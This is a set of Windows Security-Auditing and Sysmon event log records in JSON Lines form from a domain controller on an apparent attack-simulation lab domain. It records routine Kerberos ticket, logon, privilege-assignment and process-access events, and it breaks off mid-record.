{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220541,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220542,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220543,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7C004\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7c004","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220544,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7C004\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7c004","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5337,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5338,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5339,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5340,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5341,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.650","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.650\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 